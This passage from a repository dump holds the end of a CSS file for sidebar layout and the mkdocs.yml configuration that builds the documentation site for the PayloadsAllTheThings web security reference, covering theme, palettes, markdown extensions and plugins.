 9 | 
10 |     .md-sidebar{
11 |         width: auto;
12 |     } 
13 | }
14 | 
15 | /* Fix padding Chrome browsers */
16 | @supports selector(::-webkit-scrollbar) {
17 |     .md-sidebar__scrollwrap {
18 |         scrollbar-gutter: auto
19 |     }
20 | 
21 |     [dir=ltr] .md-sidebar__inner {
22 |         padding-right: 0;
23 |     }
24 | 
25 |     [dir=rtl] .md-sidebar__inner {
26 |         padding-left: calc(100% - 11.5rem)
27 |     }
28 | }


--------------------------------------------------------------------------------
/mkdocs.yml:
--------------------------------------------------------------------------------
 1 | site_name: Payloads All The Things
 2 | site_description: 'Payloads All The Things, a list of useful payloads and bypasses for Web Application Security'
 3 | site_url: https://swisskyrepo.github.io/PayloadsAllTheThings
 4 | 
 5 | repo_url: https://github.com/swisskyrepo/PayloadsAllTheThings/
 6 | edit_uri: blob/master/
 7 | 
 8 | # copyright: © 2016 PATT
 9 | # logo: 'images/site_logo.png'
10 | # favicon: 'images/favicon.png'
11 | 
12 | theme:
13 |   name: material
14 |   custom_dir: overrides
15 |   color_mode: auto
16 |   user_color_mode_toggle: true
17 |   icon:
18 |     repo: fontawesome/brands/github
19 |   palette:
20 |     # Palette toggle for light mode
21 |     - media: "(prefers-color-scheme: light)"
22 |       scheme: default
23 |       toggle:
24 |         icon: material/brightness-7
25 |         name: Switch to dark mode
26 | 
27 |     # Palette toggle for dark mode
28 |     - media: "(prefers-color-scheme: dark)"
29 |       scheme: slate
30 |       toggle:
31 |         icon: material/brightness-4
32 |         name: Switch to light mode
33 | 
34 |   features:
35 |     - content.code.copy
36 |     - content.action.edit
37 |     - content.action.view
38 |     - content.tooltips
39 |     - navigation.tracking
40 |     - navigation.top
41 |     - search.share
42 |     - search.suggest
43 |     # - toc.integrate
44 |     # - navigation.path
45 | 
46 | extra_css:
47 |   - custom.css
48 | 
49 | markdown_extensions:
50 |   - tables
51 |   - attr_list
52 |   - admonition
53 |   - def_list
54 |   - pymdownx.details
55 |   - pymdownx.superfences
56 |   - pymdownx.snippets
57 |   - pymdownx.inlinehilite
58 |   - pymdownx.highlight:
59 |       anchor_linenums: true
60 |   - pymdownx.tasklist:
61 |       custom_checkbox: true
62 |   - pymdownx.emoji:
63 |       emoji_index: !!python/name:material.extensions.emoji.twemoji
64 |       emoji_generator: !!python/name:material.extensions.emoji.to_svg
65 |   # - mdx_truly_sane_lists:
66 |   #     nested_indent: 2
67 |   #     truly_sane: True
68 |  
69 | plugins:
70 |   - search
71 |   - git-revision-date-localized
72 |   - social


--------------------------------------------------------------------------------